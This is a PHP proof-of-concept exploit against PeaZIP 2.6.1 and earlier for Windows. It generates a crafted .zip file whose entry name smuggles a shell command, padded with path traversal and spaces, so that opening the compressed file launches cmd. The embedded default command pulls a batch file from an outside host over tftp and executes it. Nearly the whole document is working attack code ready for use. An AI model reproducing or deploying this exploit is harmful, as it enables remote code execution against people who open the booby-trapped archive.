<?php /* PeaZIP <= 2.6.1 commpressed filename command injection poc exploit by Nine:Situations:Group::pyrokinesis site: http://retrogod.altervista.org/ software site: http://peazip.sourceforge.net/
tested against: peazip 2.5.1, 2.6.1 for Windows
a pipe vulnerability exists in the way peazip handles file entries, prepare the .zip file, open with it, then double click the compressed text file, a cmd shell is launched ... */
#change, cannot use slashes or backslashes here $cmd = "tftp 192.168.0.1 GET pyro pyro.bat & pyro.bat";
class zipfile { var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; var $old_offset = 0;
function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
if ($timearray['year'] < 0x7bc) { $timearray['year'] = 0x7bc; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; }
return (($timearray['year'] - 0x7bc) << 0x19) | ($timearray['mon'] << 0x15) | ($timearray['mday'] << 0x10) | ($timearray['hours'] << 0xb) | ($timearray['minutes'] << 0x5) | ($timearray['seconds'] >> 0x1); }
function addFile($data, $name, $time = 0) { $time= (int) $time; $name = str_replace('\\', '/', $name); $dtime = dechex($this->unix2DosTime($time)); $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1]; eval('$hexdtime = "' . $hexdtime . '";');
$fr = "\x50\x4b\x03\x04"; $fr .= "\x14\x00"; // ver needed to extract $fr .= "\x00\x00"; // gen purpose bit flag $fr .= "\x08\x00"; // compression method $fr .= $hexdtime; // last mod time and date
// "local file header" segment $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); // fix crc bug $c_len = strlen($zdata); $fr .= pack('V', $crc); // crc32 $fr .= pack('V', $c_len); // compressed filesize $fr .= pack('V', $unc_len); // uncompressed filesize $fr .= pack('v', strlen($name)); // length of filename $fr .= pack('v', 0); // extra field length $fr .= $name;
$fr .= $zdata; $this -> datasec[] = $fr;
$cdrec = "\x50\x4b\x01\x02"; $cdrec .= "\x00\x00"; // version made by $cdrec .= "\x14\x00"; // version needed to extract $cdrec .= "\x00\x00"; // gen purpose bit flag $cdrec .= "\x08\x00"; // compression method $cdrec .= $hexdtime; // last mod time & date $cdrec .= pack('V', $crc); // crc32 $cdrec .= pack('V', $c_len); // compressed filesize $cdrec .= pack('V', $unc_len); // uncompressed filesize $cdrec .= pack('v', strlen($name)); // length of filename $cdrec .= pack('v', 0); // extra field length $cdrec .= pack('v', 0); // file comment length $cdrec .= pack('v', 0); // disk number start $cdrec .= pack('v', 0); // internal file attributes $cdrec .= pack('V', 32); // external file attributes - 'archive' bit set
$cdrec .= pack('V', $this -> old_offset); // relative offset of local header $this -> old_offset += strlen($fr);
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec; }
function file() { $data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl_dir);
return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . // total # of entries "on this disk" pack('v', sizeof($this -> ctrl_dir)) . // total # of entries overall pack('V', strlen($ctrldir)) . // size of central dir pack('V', strlen($data)) . // offset to start of central dir "\x00\x00"; // .zip file comment length }
}
$zipfile = new zipfile(); $zipfile -> addFile("lol","../../../../../../../\" README.TXT \" ".str_repeat("\x20",0xde - strlen($cmd))."\" | $cmd | .txt"); $dump_buffer = $zipfile -> file(); assert(file_put_contents("9sg.zip",$dump_buffer)); ?>
|